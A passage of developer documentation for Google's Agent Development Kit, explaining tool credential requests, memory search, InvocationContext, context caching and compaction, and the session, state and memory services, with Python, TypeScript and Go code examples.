credential: # 2. If not, request it print("Credential not found, requesting...") try: tool_context.request_credential(MY_API_AUTH_CONFIG) # The framework handles yielding the event. The tool execution stops here for this turn. return {"status": "Authentication required. Please provide credentials."} except ValueError as e: return {"error": f"Auth error: {e}"} # e.g., function_call_id missing except Exception as e: return {"error": f"Failed to request credential: {e}"} # 3. If credential exists (might be from a previous turn after request) # or if this is a subsequent call after auth flow completed externally try: # Optionally, re-validate/retrieve if needed, or use directly # This might retrieve the credential if the external flow just completed auth_credential_obj = tool_context.get_auth_response(MY_API_AUTH_CONFIG) api_key = auth_credential_obj.api_key # Or access_token, etc. # Store it back in state for future calls within the session tool_context.state[AUTH_STATE_KEY] = auth_credential_obj.model_dump() # Persist retrieved credential print(f"Using retrieved credential to call API with data: {request_data}") # ... Make the actual API call using api_key ... api_result = f"API result for {request_data}" return {"result": api_result} except Exception as e: # Handle errors retrieving/using the credential print(f"Error using credential: {e}") # Maybe clear the state key if credential is invalid? # tool_context.state[AUTH_STATE_KEY] = None return {"error": "Failed to use credential"} ``` ```typescript // Pseudocode: Tool requiring auth import { ToolContext } from '@google/adk'; // AuthConfig from ADK or custom // Define a local AuthConfig interface as it's not publicly exported by ADK interface AuthConfig { credentialKey: string; authScheme: { type: string }; // Minimal representation for the example // Add other properties if they become relevant for the example } // Define your required auth configuration (e.g., OAuth, API Key) const MY_API_AUTH_CONFIG: AuthConfig = { credentialKey: 'my-api-key', // Example key authScheme: { type: 'api-key' }, // Example scheme type }; const AUTH_STATE_KEY = 'user:my_api_credential'; // Key to store retrieved credential async function callSecureApi(toolContext: ToolContext, requestData: string): Promise> { // 1. Check if credential already exists in state const credential = toolContext.state.get(AUTH_STATE_KEY); if (!credential) { // 2. If not, request it console.log('Credential not found, requesting...'); try { toolContext.requestCredential(MY_API_AUTH_CONFIG); // The framework handles yielding the event. The tool execution stops here for this turn. return { status: 'Authentication required. Please provide credentials.' }; } catch (e) { return { error: `Auth or credential request error: ${e}` }; } } // 3. If credential exists (might be from a previous turn after request) // or if this is a subsequent call after auth flow completed externally try { // Optionally, re-validate/retrieve if needed, or use directly // This might retrieve the credential if the external flow just completed const authCredentialObj = toolContext.getAuthResponse(MY_API_AUTH_CONFIG); const apiKey = authCredentialObj?.apiKey; // Or accessToken, etc. // Store it back in state for future calls within the session // Note: In strict TS, might need to cast or serialize authCredentialObj toolContext.state.set(AUTH_STATE_KEY, JSON.stringify(authCredentialObj)); console.log(`Using retrieved credential to call API with data: ${requestData}`); // ... Make the actual API call using apiKey ... const apiResult = `API result for ${requestData}`; return { result: apiResult }; } catch (e) { // Handle errors retrieving/using the credential console.error(`Error using credential: ${e}`); // Maybe clear the state key if credential is invalid? // toolContext.state.set(AUTH_STATE_KEY, null); return { error: 'Failed to use credential' }; } } ``` *Remember: `request_credential` pauses the tool and signals the need for authentication. The user/system provides credentials, and on a subsequent call, `get_auth_response` (or checking state again) allows the tool to proceed.* The `tool_context.function_call_id` is used implicitly by the framework to link the request and response. ### Leveraging Memory Supported in ADKPython v0.1.0TypeScript v0.2.0 Access relevant information from the past or external sources. ```python # Pseudocode: Tool using memory search from google.adk.tools import ToolContext def find_related_info(tool_context: ToolContext, topic: str) -> dict: try: search_results = tool_context.search_memory(f"Information about {topic}") if search_results.results: print(f"Found {len(search_results.results)} memory results for '{topic}'") # Process search_results.results (which are SearchMemoryResponseEntry) top_result_text = search_results.results[0].text return {"memory_snippet": top_result_text} else: return {"message": "No relevant memories found."} except ValueError as e: return {"error": f"Memory service error: {e}"} # e.g., Service not configured except Exception as e: return {"error": f"Unexpected error searching memory: {e}"} ``` ```typescript // Pseudocode: Tool using memory search import { ToolContext } from '@google/adk'; async function findRelatedInfo(toolContext: ToolContext, topic: string): Promise> { try { const searchResults = await toolContext.searchMemory(`Information about ${topic}`); if (searchResults.results?.length) { console.log(`Found ${searchResults.results.length} memory results for '${topic}'`); // Process searchResults.results const topResultText = searchResults.results[0].text; return { memory_snippet: topResultText }; } else { return { message: 'No relevant memories found.' }; } } catch (e) { return { error: `Memory service error: ${e}` }; // e.g., Service not configured } } ``` ### Advanced: Direct `InvocationContext` Usage Supported in ADKPython v0.1.0TypeScript v0.2.0 While most interactions happen via `CallbackContext` or `ToolContext`, sometimes the agent's core logic (`_run_async_impl`/`_run_live_impl`) needs direct access. ```python # Pseudocode: Inside agent's _run_async_impl from google.adk.agents import BaseAgent from google.adk.agents.invocation_context import InvocationContext from google.adk.events import Event from typing import AsyncGenerator class MyControllingAgent(BaseAgent): async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: # Example: Check if a specific service is available if not ctx.memory_service: print("Memory service is not available for this invocation.") # Potentially change agent behavior # Example: Early termination based on some condition if ctx.session.state.get("critical_error_flag"): print("Critical error detected, ending invocation.") ctx.end_invocation = True # Signal framework to stop processing yield Event(author=self.name, invocation_id=ctx.invocation_id, content="Stopping due to critical error.") return # Stop this agent's execution # ... Normal agent processing ... yield # ... event ... ``` ```typescript // Pseudocode: Inside agent's runAsyncImpl import { BaseAgent, InvocationContext } from '@google/adk'; import type { Event } from '@google/adk'; class MyControllingAgent extends BaseAgent { async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator { // Example: Check if a specific service is available if (!ctx.memoryService) { console.log('Memory service is not available for this invocation.'); // Potentially change agent behavior } // Example: Early termination based on some condition // Direct access to state via ctx.session.state or through ctx.session.state property if wrapped if ((ctx.session.state as { 'critical_error_flag': boolean })['critical_error_flag']) { console.log('Critical error detected, ending invocation.'); ctx.endInvocation = true; // Signal framework to stop processing yield { author: this.name, invocationId: ctx.invocationId, content: { parts: [{ text: 'Stopping due to critical error.' }] } } as Event; return; // Stop this agent's execution } // ... Normal agent processing ... yield; // ... event ... } } ``` Setting `ctx.end_invocation = True` is a way to gracefully stop the entire request-response cycle from within the agent or its callbacks/tools (via their respective context objects which also have access to modify the underlying `InvocationContext`'s flag). ## Key Takeaways & Best Practices - **Use the Right Context:** Always use the most specific context object provided (`ToolContext` in tools/tool-callbacks, `CallbackContext` in agent/model-callbacks, `ReadonlyContext` where applicable). Use the full `InvocationContext` (`ctx`) directly in `_run_async_impl` / `_run_live_impl` only when necessary. - **State for Data Flow:** `context.state` is the primary way to share data, remember preferences, and manage conversational memory *within* an invocation. Use prefixes (`app:`, `user:`, `temp:`) thoughtfully when using persistent storage. - **Artifacts for Files:** Use `context.save_artifact` and `context.load_artifact` for managing file references (like paths or URIs) or larger data blobs. Store references, load content on demand. - **Tracked Changes:** Modifications to state or artifacts made via context methods are automatically linked to the current step's `EventActions` and handled by the `SessionService`. - **Start Simple:** Focus on `state` and basic artifact usage first. Explore authentication, memory, and advanced `InvocationContext` fields (like those for live streaming) as your needs become more complex. By understanding and effectively using these context objects, you can build more sophisticated, stateful, and capable agents with ADK. # Context caching with Gemini Supported in ADKPython v1.15.0 When working with agents to complete tasks, you may want to reuse extended instructions or large sets of data across multiple agent requests to a generative AI model. Resending this data for each agent request is slow, inefficient, and can be expensive. Using context caching features in generative AI models can significantly speed up responses and lower the number of tokens sent to the model for each request. The ADK Context Caching feature allows you to cache request data with generative AI models that support it, including Gemini 2.0 and higher models. This document explains how to configure and use this feature. ## Configure context caching You configure the context caching feature at the ADK `App` object level, which wraps your agent. Use the `ContextCacheConfig` class to configure these settings, as shown in the following code sample: ```python from google.adk import Agent from google.adk.apps.app import App from google.adk.agents.context_cache_config import ContextCacheConfig root_agent = Agent( # configure an agent using Gemini 2.0 or higher ) # Create the app with context caching configuration app = App( name='my-caching-agent-app', root_agent=root_agent, context_cache_config=ContextCacheConfig( min_tokens=2048, # Minimum tokens to trigger caching ttl_seconds=600, # Store for up to 10 minutes cache_intervals=5, # Refresh after 5 uses ), ) ``` ## Configuration settings The `ContextCacheConfig` class has the following settings that control how caching works for your agent. When you configure these settings, they apply to all agents within your app. - **`min_tokens`** (int): The minimum number of tokens required in a request to enable caching. This setting allows you to avoid the overhead of caching for very small requests where the performance benefit would be negligible. Defaults to `0`. - **`ttl_seconds`** (int): The time-to-live (TTL) for the cache in seconds. This setting determines how long the cached content is stored before it is refreshed. Defaults to `1800` (30 minutes). - **`cache_intervals`** (int): The maximum number of times the same cached content can be used before it expires. This setting allows you to control how frequently the cache is updated, even if the TTL has not expired. Defaults to `10`. ## Next steps For a full implementation of how to use and test the context caching feature, see the following sample: - [`cache_analysis`](https://github.com/google/adk-python/tree/main/contributing/samples/cache_analysis): A code sample that demonstrates how to analyze the performance of context caching. If your use case requires that you provide instructions that are used throughout a session, consider using the `static_instruction` parameter for an agent, which allows you to amend the system instructions for a generative model. For more details, see this sample code: - [`static_instruction`](https://github.com/google/adk-python/tree/main/contributing/samples/static_instruction): An implementation of a digital pet agent using static instructions. # Compress agent context for performance Supported in ADKPython v1.16.0 As an ADK agent runs it collects *context* information, including user instructions, retrieved data, tool responses, and generated content. As the size of this context data grows, agent processing times typically also increase. More and more data is sent to the generative AI model used by the agent, increasing processing time and slowing down responses. The ADK Context Compaction feature is designed to reduce the size of context as an agent is running by summarizing older parts of the agent workflow event history. The Context Compaction feature uses a *sliding window* approach for collecting and summarizing agent workflow event data within a [Session](/adk-docs/sessions/session/). When you configure this feature in your agent, it summarizes data from older events once it reaches a threshold of a specific number of workflow events, or invocations, with the current Session. ## Configure context compaction Add context compaction to your agent workflow by adding an Events Compaction Configuration setting to the App object of your workflow. As part of the configuration, you must specify a compaction interval and overlap size, as shown in the following sample code: ```python from google.adk.apps.app import App from google.adk.apps.app import EventsCompactionConfig app = App( name='my-agent', root_agent=root_agent, events_compaction_config=EventsCompactionConfig( compaction_interval=3, # Trigger compaction every 3 new invocations. overlap_size=1 # Include last invocation from the previous window. ), ) ``` Once configured, the ADK `Runner` handles the compaction process in the background each time the session reaches the interval. ## Example of context compaction If you set `compaction_interval` to 3 and `overlap_size` to 1, the event data is compressed upon completion of events 3, 6, 9, and so on. The overlap setting increases size of the second summary compression, and each summary afterwards, as shown in Figure 1. **Figure 1.** Ilustration of event compaction configuration with a interval of 3 and overlap of 1. With this example configuration, the context compression tasks happen as follows: 1. **Event 3 completes**: All 3 events are compressed into a summary 1. **Event 6 completes**: Events 3 to 6 are compressed, including the overlap of 1 prior event 1. **Event 9 completes**: Events 6 to 9 are compressed, including the overlap of 1 prior event ## Configuration settings The configuration settings for this feature control how frequently event data is compressed and how much data is retained as the agent workflow runs. Optionally, you can configure a compactor object - **`compaction_interval`**: Set the number of completed events that triggers compaction of the prior event data. - **`overlap_size`**: Set how many of the previously compacted events are included in a newly compacted context set. - **`summarizer`**: (Optional) Define a summarizer object including a specific AI model to use for summarization. For more information, see [Define a Summarizer](#define-summarizer). ### Define a Summarizer You can customize the process of context compression by defining a summarizer. The LlmEventSummarizer class allows you to specify a particular model for summarization. The following code example demonstrates how to define and configure a custom summarizer: ```python from google.adk.apps.app import App, EventsCompactionConfig from google.adk.apps.llm_event_summarizer import LlmEventSummarizer from google.adk.models import Gemini # Define the AI model to be used for summarization: summarization_llm = Gemini(model="gemini-2.5-flash") # Create the summarizer with the custom model: my_summarizer = LlmEventSummarizer(llm=summarization_llm) # Configure the App with the custom summarizer and compaction settings: app = App( name='my-agent', root_agent=root_agent, events_compaction_config=EventsCompactionConfig( compaction_interval=3, overlap_size=1, summarizer=my_summarizer, ), ) ``` You can further refine the operation of the `SlidingWindowCompactor` by by modifying its summarizer class `LlmEventSummarizer` including changing the `prompt_template` setting of that class. For more details, see the [`LlmEventSummarizer` code](https://github.com/google/adk-python/blob/main/src/google/adk/apps/llm_event_summarizer.py#L60). # Introduction to Conversational Context: Session, State, and Memory Supported in ADKPythonTypeScriptGoJava Meaningful, multi-turn conversations require agents to understand context. Just like humans, they need to recall the conversation history: what's been said and done to maintain continuity and avoid repetition. The Agent Development Kit (ADK) provides structured ways to manage this context through `Session`, `State`, and `Memory`. ## Core Concepts Think of different instances of your conversations with the agent as distinct **conversation threads**, potentially drawing upon **long-term knowledge**. 1. **`Session`**: The Current Conversation Thread - Represents a *single, ongoing interaction* between a user and your agent system. - Contains the chronological sequence of messages and actions taken by the agent (referred to `Events`) during *that specific interaction*. - A `Session` can also hold temporary data (`State`) relevant only *during this conversation*. 1. **`State` (`session.state`)**: Data Within the Current Conversation - Data stored within a specific `Session`. - Used to manage information relevant *only* to the *current, active* conversation thread (e.g., items in a shopping cart *during this chat*, user preferences mentioned *in this session*). 1. **`Memory`**: Searchable, Cross-Session Information - Represents a store of information that might span *multiple past sessions* or include external data sources. - It acts as a knowledge base the agent can *search* to recall information or context beyond the immediate conversation. ## Managing Context: Services ADK provides services to manage these concepts: 1. **`SessionService`**: Manages the different conversation threads (`Session` objects) - Handles the lifecycle: creating, retrieving, updating (appending `Events`, modifying `State`), and deleting individual `Session`s. 1. **`MemoryService`**: Manages the Long-Term Knowledge Store (`Memory`) - Handles ingesting information (often from completed `Session`s) into the long-term store. - Provides methods to search this stored knowledge based on queries. **Implementations**: ADK offers different implementations for both `SessionService` and `MemoryService`, allowing you to choose the storage backend that best fits your application's needs. Notably, **in-memory implementations** are provided for both services; these are designed specifically for **local testing and fast development**. It's important to remember that **all data stored using these in-memory options (sessions, state, or long-term knowledge) is lost when your application restarts**. For persistence and scalability beyond local testing, ADK also offers cloud-based and database service options. **In Summary:** - **`Session` & `State`**: Focus on the **current interaction** – the history and data of the *single, active conversation*. Managed primarily by a `SessionService`. - **Memory**: Focuses on the **past and external information** – a *searchable archive* potentially spanning across conversations. Managed by a `MemoryService`. ## What's Next? In the following sections, we'll dive deeper into each of these components: - **`Session`**: Understanding its structure and `Events`. - **`State`**: How to effectively read, write, and manage session-specific data. - **`SessionService`**: Choosing the right storage backend for your sessions. - **`MemoryService`**: Exploring options for storing and retrieving broader context. Understanding these concepts is fundamental to building agents that can engage in complex, stateful, and context-aware conversations. # Memory: Long-Term Knowledge with `MemoryService` Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 We've seen how `Session` tracks the history (`events`) and temporary data (`state`) for a *single, ongoing conversation*. But what if an agent needs to recall information from *past* conversations? This is where the concept of **Long-Term Knowledge** and the **`MemoryService`** come into play. Think of it this way: - **`Session` / `State`:** Like your short-term memory during one specific chat. - **Long-Term Knowledge (`MemoryService`)**: Like a searchable archive or knowledge library the agent can consult, potentially containing information from many past chats or other sources. ## The `MemoryService` Role The `BaseMemoryService` defines the interface for managing this searchable, long-term knowledge store. Its primary responsibilities are: 1. **Ingesting Information (`add_session_to_memory`):** Taking the contents of a (usually completed) `Session` and adding relevant information to the long-term knowledge store. 1. **Searching Information (`search_memory`):** Allowing an agent (typically via a `Tool`) to query the knowledge store and retrieve relevant snippets or context based on a search query. ## Choosing the Right Memory Service The ADK offers two distinct `MemoryService` implementations, each tailored to different use cases. Use the table below to decide which is the best fit for your agent. | **Feature** | **InMemoryMemoryService** | **VertexAiMemoryBankService** | | --------------------- | --------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | **Persistence** | None (data is lost on restart) | Yes (Managed by Vertex AI) | | **Primary Use Case** | Prototyping, local development, and simple testing. | Building meaningful, evolving memories from user conversations. | | **Memory Extraction** | Stores full conversation | Extracts [meaningful information](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/memory-bank/generate-memories) from conversations and consolidates it with existing memories (powered by LLM) | | **Search Capability** | Basic keyword matching. | Advanced semantic search. | | **Setup Complexity** | None. It's the default. | Low. Requires an [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/memory-bank/overview) instance in Vertex AI. | | **Dependencies** | None. | Google Cloud Project, Vertex AI API | | **When to use it** | When you want to search across multiple sessions’ chat histories for prototyping. | When you want your agent to remember and learn from past interactions. | ## In-Memory Memory The `InMemoryMemoryService` stores session information in the application's memory and performs basic keyword matching for searches. It requires no setup and is best for prototyping and simple testing scenarios where persistence isn't required. ```py from google.adk.memory import InMemoryMemoryService memory_service = InMemoryMemoryService() ``` ```go import ( "google.golang.org/adk/memory" "google.golang.org/adk/session" ) // Services must be shared across runners to share state and memory. sessionService := session.InMemoryService() memoryService := memory.InMemoryService() ``` **Example: Adding and Searching Memory** This example demonstrates the basic flow using the `InMemoryMemoryService` for simplicity. ```py import asyncio from google.adk.agents import LlmAgent from google.adk.sessions import InMemorySessionService, Session from google.adk.memory import InMemoryMemoryService # Import MemoryService from google.adk.runners import Runner from google.adk.tools import load_memory # Tool to query memory from google.genai.types import Content, Part # --- Constants --- APP_NAME = "memory_example_app" USER_ID = "mem_user" MODEL = "gemini-2.0-flash" # Use a valid model # --- Agent Definitions --- # Agent 1: Simple agent to capture information info_capture_agent = LlmAgent( model=MODEL, name="InfoCaptureAgent", instruction="Acknowledge the user's statement.", ) # Agent 2: Agent that can use memory memory_recall_agent = LlmAgent( model=MODEL, name="MemoryRecallAgent", instruction="Answer the user's question. Use the 'load_memory' tool " "if the answer might be in past conversations.", tools=[load_memory] # Give the agent the tool ) # --- Services --- # Services must be shared across runners to share state and memory session_service = InMemorySessionService() memory_service = InMemoryMemoryService() # Use in-memory for demo async def run_scenario(): # --- Scenario --- # Turn 1: Capture some information in a session print("--- Turn 1: Capturing Information ---") runner1 = Runner( # Start with the info capture agent agent=info_capture_agent, app_name=APP_NAME, session_service=session_service, memory_service=memory_service # Provide the memory service to the Runner ) session1_id = "session_info" await runner1.session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=session1_id) user_input1 = Content(parts=[Part(text="My favorite project is Project Alpha.")], role="user") # Run the agent final_response_text = "(No final response)" async for event in runner1.run_async(user_id=USER_ID, session_id=session1_id, new_message=user_input1): if event.is_final_response() and event.content and event.content.parts: final_response_text = event.content.parts[0].text print(f"Agent 1 Response: {final_response_text}") # Get the completed session completed_session1 = await runner1.session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=session1_id) # Add this session's content to the Memory Service print("\n--- Adding Session 1 to Memory ---") await memory_service.add_session_to_memory(completed_session1) print("Session added to memory.") # Turn 2: Recall the information in a new session print("\n--- Turn 2: Recalling Information ---") runner2 = Runner( # Use the second agent, which has the memory tool agent=memory_recall_agent, app_name=APP_NAME, session_service=session_service, # Reuse the same service memory_service=memory_service # Reuse the same service ) session2_id = "session_recall" await runner2.session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=session2_id) user_input2 = Content(parts=[Part(text="What is my favorite project?")], role="user") # Run the second agent final_response_text_2 = "(No final response)" async for event in runner2.run_async(user_id=USER_ID, session_id=session2_id, new_message=user_input2): if event.is_final_response() and event.content and event.content.parts: final_response_text_2 = event.content.parts[0].text print(f"Agent 2 Response: {final_response_text_2}") # To run this example, you can use the following snippet: # asyncio.run(run_scenario()) # await run_scenario() ``` ```go import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/memory" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) const ( appName = "go_memory_example_app" userID = "go_mem_user" modelID = "gemini-2.5-pro" ) // Args defines the input structure for the memory search tool. type Args struct { Query string `json:"query" jsonschema:"The query to search for in the memory."` } // Result defines the output structure for the memory search tool. type Result struct { Results []string `json:"results"` } // memorySearchToolFunc is the implementation of the memory search tool. // This function demonstrates accessing memory via tool.Context. func memorySearchToolFunc(tctx tool.Context, args Args) (Result, error) { fmt.Printf("Tool: Searching memory for query: '%s'\n", args.Query) // The SearchMemory function is available on the context. searchResults, err := tctx.SearchMemory(context.Background(), args.Query) if err != nil { log.Printf("Error searching memory: %v", err) return Result{}, fmt.Errorf("failed memory search") } var results []string for _, res := range searchResults.Memories { if res.Content != nil { results = append(results, textParts(res.Content)...) } } return Result{Results: results}, nil } // Define a tool that can search memory. var memorySearchTool = must(functiontool.New( functiontool.Config{ Name: "search_past_conversations", Description: "Searches past conversations for relevant information.", }, memorySearchToolFunc, )) // This example demonstrates how to use the MemoryService in the Go ADK. // It covers two main scenarios: // 1. Adding a completed session to memory and recalling it in a new session. // 2. Searching memory from within a custom tool using the tool.Context. func main() { ctx := context.Background() // --- Services --- // Services must be shared across runners to share state and memory. sessionService := session.InMemoryService() memoryService := memory.InMemoryService() // Use in-memory for this demo. // --- Scenario 1: Capture information in one session --- fmt.Println("--- Turn 1: Capturing Information ---") infoCaptureAgent := must(llmagent.New(llmagent.Config{ Name: "InfoCaptureAgent", Model: must(gemini.NewModel(ctx, modelID, nil)), Instruction: "Acknowledge the user's statement.", })) runner1 := must(runner.New(runner.Config{ AppName: appName, Agent: infoCaptureAgent, SessionService: sessionService, MemoryService: memoryService, // Provide the memory service to the Runner })) session1ID := "session_info" must(sessionService.Create(ctx, &session.CreateRequest{AppName: appName, UserID: userID, SessionID: session1ID})) userInput1 := genai.NewContentFromText("My favorite project is Project Alpha.", "user") var finalResponseText string for event, err := range runner1.Run(ctx, userID, session1ID, userInput1, agent.RunConfig{}) { if err != nil { log.Printf("Agent 1 Error: %v", err) continue } if event.Content != nil && !event.LLMResponse.Partial { finalResponseText = strings.Join(textParts(event.LLMResponse.Content), "") } } fmt.Printf("Agent 1 Response: %s\n", finalResponseText) // Add the completed session to the Memory Service fmt.Println("\n--- Adding Session 1 to Memory ---") resp, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: session1ID}) if err != nil { log.Fatalf("Failed to get completed session: %v", err) } if err := memoryService.AddSession(ctx, resp.Session); err != nil { log.Fatalf("Failed to add session to memory: %v", err) } fmt.Println("Session added to memory.") // --- Scenario 2: Recall the information in a new session using a tool --- fmt.Println("\n--- Turn 2: Recalling Information ---") memoryRecallAgent := must(llmagent.New(llmagent.Config{ Name: "MemoryRecallAgent", Model: must(gemini.NewModel(ctx, modelID, nil)), Instruction: "Answer the user's question. Use the 'search_past_conversations' tool if the answer might be in past conversations.", Tools: []tool.Tool{memorySearchTool}, // Give the agent the tool })) runner2 := must(runner.New(runner.Config{ Agent: memoryRecallAgent, AppName: appName, SessionService: sessionService, MemoryService: memoryService, })) session2ID := "session_recall" must(sessionService.Create(ctx, &session.CreateRequest{AppName: appName, UserID: userID, SessionID: session2ID})) userInput2 := genai.NewContentFromText("What is my favorite project?", "user") var finalResponseText2 string for event, err := range runner2.Run(ctx, userID, session2ID, userInput2, agent.RunConfig{}) { if err != nil { log.Printf("Agent 2 Error: %v", err) continue } if event.Content != nil && !event.LLMResponse.Partial { finalResponseText2 = strings.Join(textParts(event.LLMResponse.Content), "") } } fmt.Printf("Agent 2 Response: %s\n", finalResponseText2) } ``` ### Searching Memory Within a Tool You can also search memory from within a custom tool by using the `tool.Context`. ```go // memorySearchToolFunc is the implementation of the memory search tool. // This function demonstrates accessing memory via tool.Context. func memorySearchToolFunc(tctx tool.Context, args Args) (Result, error) { fmt.Printf("Tool: Searching memory for query: '%s'\n", args.Query) // The SearchMemory function is available on the context. searchResults, err := tctx.SearchMemory(context.Background(), args.Query) if err != nil { log.Printf("Error searching memory: %v", err) return Result{}, fmt.Errorf("failed memory search") } var results []string for _, res := range searchResults.Memories { if res.Content != nil { results = append(results, textParts(res.Content)...) } } return Result{Results: results}, nil } // Define a tool that can search memory. var memorySearchTool = must(functiontool.New( functiontool.Config{ Name: "search_past_conversations", Description: "Searches past conversations for relevant information.", }, memorySearchToolFunc, )) ``` ## Vertex AI Memory Bank The `VertexAiMemoryBankService` connects your agent to [Vertex AI Memory Bank](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/memory-bank/overview), a fully managed Google Cloud service that provides sophisticated, persistent memory capabilities for conversational agents. ### How It Works The service handles two key operations: - **Generating Memories:** At the end of a conversation, you can send the session's events to the Memory Bank, which intelligently processes and stores the information as "memories." - **Retrieving Memories:** Your agent code can issue a search query against the Memory Bank to retrieve relevant memories from past conversations. ### Prerequisites Before you can use this feature, you must have: 1. **A Google Cloud Project:** With the Vertex AI API enabled. 1. **An Agent Engine:** You need to create an Agent Engine in Vertex AI. You do not need to deploy your agent to Agent Engine Runtime to use Memory Bank. This will provide you with the **Agent Engine ID** required for configuration. 1. **Authentication:** Ensure your local environment is authenticated to access Google Cloud services. The simplest way is to run: ```bash gcloud auth application-default login ``` 1. **Environment Variables:** The service requires your Google Cloud Project ID and Location. Set them as environment variables: ```bash export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" export GOOGLE_CLOUD_LOCATION="your-gcp-location" ``` ### Configuration To connect your agent to the Memory Bank, you use the `--memory_service_uri` flag when starting the ADK server (`adk web` or `adk api_server`). The URI must be in the format `agentengine://`. bash ```bash adk web path/to/your/agents_dir --memory_service_uri="agentengine://1234567890" ``` Or, you can configure your agent to use the Memory Bank by manually instantiating the `VertexAiMemoryBankService` and passing it to the `Runner`. ```py from google.adk.memory import VertexAiMemoryBankService agent_engine_id = agent_engine.api_resource.name.split("/")[-1] memory_service = VertexAiMemoryBankService( project="PROJECT_ID", location="LOCATION", agent_engine_id=agent_engine_id ) runner = adk.Runner( ... memory_service=memory_service ) ``` ## Using Memory in Your Agent When a memory service is configured, your agent can use a tool or callback to retrieve memories. ADK includes two pre-built tools for retrieving memories: - `PreloadMemory`: Always retrieve memory at the beginning of each turn (similar to a callback). - `LoadMemory`: Retrieve memory when your agent decides it would be helpful. **Example:** ```python from google.adk.agents import Agent from google.adk.tools.preload_memory_tool import PreloadMemoryTool agent = Agent( model=MODEL_ID, name='weather_sentiment_agent', instruction="...", tools=[PreloadMemoryTool()] ) ``` To extract memories from your session, you need to call `add_session_to_memory`. For example, you can automate this via a callback: ```python from google import adk async def auto_save_session_to_memory_callback(callback_context): await callback_context._invocation_context.memory_service.add_session_to_memory( callback_context._invocation_context.session) agent = Agent( model=MODEL, name="Generic_QA_Agent", instruction="Answer the user's questions", tools=[adk.tools.preload_memory_tool.PreloadMemoryTool()], after_agent_callback=auto_save_session_to_memory_callback, ) ``` ## Advanced Concepts ### How Memory Works in Practice The memory workflow internally involves these steps: 1. **Session Interaction:** A user interacts with an agent via a `Session`, managed by a `SessionService`. Events are added, and state might be updated. 1. **Ingestion into Memory:** At some point (often when a session is considered complete or has yielded significant information), your application calls `memory_service.add_session_to_memory(session)`. This extracts relevant information from the session's events and adds it to the long-term knowledge store (in-memory dictionary or Agent Engine Memory Bank). 1. **Later Query:** In a *different* (or the same) session, the user might ask a question requiring past context (e.g., "What did we discuss about project X last week?"). 1. **Agent Uses Memory Tool:** An agent equipped with a memory-retrieval tool (like the built-in `load_memory` tool) recognizes the need for past context. It calls the tool, providing a search query (e.g., "discussion project X last week"). 1. **Search Execution:** The tool internally calls `memory_service.search_memory(app_name, user_id, query)`. 1. **Results Returned:** The `MemoryService` searches its store (using keyword matching or semantic search) and returns relevant snippets as a `SearchMemoryResponse` containing a list of `MemoryResult` objects (each potentially holding events from a relevant past session). 1. **Agent Uses Results:** The tool returns these results to the agent, usually as part of the context or function response. The agent can then use this retrieved information to formulate its final answer to the user. ### Can an agent have access to more than one memory service? - **Through Standard Configuration: No.** The framework (`adk web`, `adk api_server`) is designed to be configured with one single memory service at a time via the `--memory_service_uri` flag. This single service is then provided to the agent and accessed through the built-in `self.search_memory()` method. From a configuration standpoint, you can only choose one backend (`InMemory`, `VertexAiMemoryBankService`) for all agents served by that process. - **Within Your Agent's Code: Yes, absolutely.** There is nothing preventing you from manually importing and instantiating another memory service directly inside your agent's code. This allows you to access multiple memory sources within a single agent turn. For example, your agent could use the framework-configured `InMemoryMemoryService` to recall conversational history, and also manually instantiate a `VertexAiMemoryBankService` to look up information in a technical manual. #### Example: Using Two Memory Services Here’s how you could implement that in your agent's code: ```python from google.adk.agents import Agent from google.adk.memory import InMemoryMemoryService, VertexAiMemoryBankService from google.genai import types class MultiMemoryAgent(Agent): def __init__(self, **kwargs): super().__init__(**kwargs) self.memory_service = InMemoryMemoryService() # Manually instantiate a second memory service for document lookups self.vertexai_memorybank_service = VertexAiMemoryBankService( project="PROJECT_ID", location="LOCATION", agent_engine_id="AGENT_ENGINE_ID" ) async def run(self, request: types.Content, **kwargs) -> types.Content: user_query = request.parts[0].text # 1. Search conversational history using the framework-provided memory # (This would be InMemoryMemoryService if configured) conversation_context = await self.memory_service.search_memory(query=user_query) # 2. Search the document knowledge base using the manually created service document_context = await self.vertexai_memorybank_service.search_memory(query=user_query) # Combine the context from both sources to generate a better response prompt = "From our past conversations, I remember:\n" prompt += f"{conversation_context.memories}\n\n" prompt += "From the technical manuals, I found:\n" prompt += f"{document_context.memories}\n\n" prompt += f"Based on all this, here is my answer to '{user_query}':" return await self.llm.generate_content_async(prompt) ``` # State: The Session's Scratchpad Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Within each `Session` (our conversation thread), the **`state`** attribute acts like the agent's dedicated scratchpad for that specific interaction. While `session.events` holds the full history, `session.state` is where the agent stores and updates dynamic details needed *during* the conversation. ## What is `session.state`? Conceptually, `session.state` is a collection (dictionary or Map) holding key-value pairs. It's designed for information the agent needs to recall or track to make the current conversation effective: - **Personalize Interaction:** Remember user preferences mentioned earlier (e.g., `'user_preference_theme': 'dark'`). - **Track Task Progress:** Keep tabs on steps in a multi-turn process (e.g., `'booking_step': 'confirm_payment'`). - **Accumulate Information:** Build lists or summaries (e.g., `'shopping_cart_items': ['book', 'pen']`). - **Make Informed Decisions:** Store flags or values influencing the next response (e.g., `'user_is_authenticated': True`). ### Key Characteristics of `State` 1. **Structure: Serializable Key-Value Pairs** - Data is stored as `key: value`. - **Keys:** Always strings (`str`). Use clear names (e.g., `'departure_city'`, `'user:language_preference'`). - **Values:** Must be **serializable**. This means they can be easily saved and loaded by the `SessionService`. Stick to basic types in the specific languages (Python/Go/Java/TypeScript) like strings, 